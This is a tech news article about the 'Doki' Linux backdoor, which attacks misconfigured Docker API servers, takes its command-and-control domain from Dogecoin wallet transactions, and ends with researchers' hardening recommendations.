IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

'Doki' malware attacks Docker servers using Dogecoin

Misconfigured Docker API ports are being scanned and exploited by a threat that's evolved from the Ngrok Botnet campaign

A graphic of the Doge cryptocurrency

Malware that has remained undetected for six months is exploiting misconfigured Docker API ports to launch malicious payloads, while abusing the Dogecoin cryptocurrency blockchain in the process.

The malware, known as ‘Doki’, is targeting misconfigured containerised environments hosted on Azure, AWS, and a number of other major cloud platforms, according to Intezer researchers, with attackers able to find publicly accessible Docker API ports and exploit them to establish their own containers.

Doki is then able to instal malware on targeted infrastructure based on code received from its operators, spawning and deleting containers during the process.

Doki serves as an undetectable Linux backdoor, and represents an evolution of the two-year-old Ngrok Botnet campaign. Alarmingly, it has also managed to evade every one of the 60 malware platforms listed on VirusTotal since it was first analysed in January 2020.

This particular strain is unusual in the sense that it abuses the Dogecoin cryptocurrency blockchain in order to attack these containerised environments. The attackers use a fairly ingenious method to prevent the botnet infrastructure from being taken down, which involves dynamically changing the command and control (C2) server's domain based on the transactions recorded on a Dogecoin wallet.

The C2 domain address, from which the payload is sent, changes based on the amount of Dogecoin in the wallet at any given time. When a cryptocurrency is added or removed from the wallet, the system encodes the transaction and creates a new unique address from which they can control the Doki malware.

Because of the secure and decentralised nature of Blockchain, this infrastructure can't be taken down by law enforcement, and new addresses can't be pre-empted by others as only the attackers can make transactions on their Dogecoin wallet.

“Linux threats are becoming more common. A contributing factor to this is the increasing shift and reliance on cloud environments, which are mostly based on Linux infrastructure,” said researchers Nicole Fishbein and Michael Kajiloti. “Hence, attackers have been adapting accordingly with new tools and techniques designed specifically for this infrastructure.”

Historically, the Ngrok Botnet has been one of the most prevalent threats abusing misconfigured Docker API ports in such a way to execute malware, they added. As part of the attack, the hackers would abuse Docker configuration features to elude container restrictions and execute various payloads from the host.

Such threats also deploy network scanners to identify the cloud providers’ IP ranges for additional potentially vulnerable targets. What makes it so dangerous is that it only takes a few hours from when a misconfigured Docker server is online to become infected.

Meanwhile, because the cryptocurrency blockchain the hackers abuse is immutable and decentralised, Fishbein and Kajiloti added, the method is resistant to infrastructure takedowns as well as domain filtering attempts.

Hackers can create any container as part of the attack, and execute code from the host machine by exploiting a container escape method. This is based on creating a new container, which is achieved by posting a ‘create’ API request.

Each container is based on an alpine image with curl installed, which isn’t malicious in and of itself, rather it’s abused to execute the attack with curl commands, activated as soon as the container’s up and running.

Related Resource

IT Pro 20/20: A quantum leap for security

The sixth issue of IT Pro 20/20 looks at the state of cyber security in 2020 and beyond


Hackers then abuse the Ngrok service, which provides secure tunnels connecting between local servers and the public internet, to craft unique URLs with a short lifetime, using them to download payloads during the attack by passing them to the curl-based image.

“The Ngrok Botnet campaign has been ongoing for over two years and is rather effective, infecting any misconfigured Docker API server in a matter of hours,” added Nicole Fishbein and Michael Kajiloti. “The incorporation of the unique and undetected Doki malware indicates the operation is continuing to evolve.

“This attack is very dangerous due to the fact the attacker uses container escape techniques to gain full control of the victim’s infrastructure. Our evidence shows that it takes only a few hours from when a new misconfigured Docker server is up online to become infected by this campaign.”

The researchers have recommended that both companies and individuals who own cloud-based container servers must immediately fix their configuration settings to prevent exposure to the threat. This process includes checking for any exposed ports, verifying there are no foreign or unknown containers among existing containers, and monitoring excessive use of computing resources.

Featured Resources

The Total Economic Impact™ Of Turbonomic Application Resource Management for IBM Cloud® Paks

Business benefits and cost savings enabled by IBM Turbonomic Application Resource Management

Free Download

The Total Economic Impact™ of IBM Watson Assistant

Cost savings and business benefits enabled by Watson Assistant

Free Download

The field guide to application modernisation

Moving forward with your enterprise application portfolio

Free Download

AI for customer service

Discover the industry-leading AI platform that customers and employees want to use

Free Download

Most Popular

Why convenience is the biggest threat to your security

Why convenience is the biggest threat to your security

8 Aug 2022
UK water supplier confirms hack by Cl0p ransomware gang

UK water supplier confirms hack by Cl0p ransomware gang

16 Aug 2022
How to boot Windows 11 in Safe Mode
Microsoft Windows

How to boot Windows 11 in Safe Mode

29 Jul 2022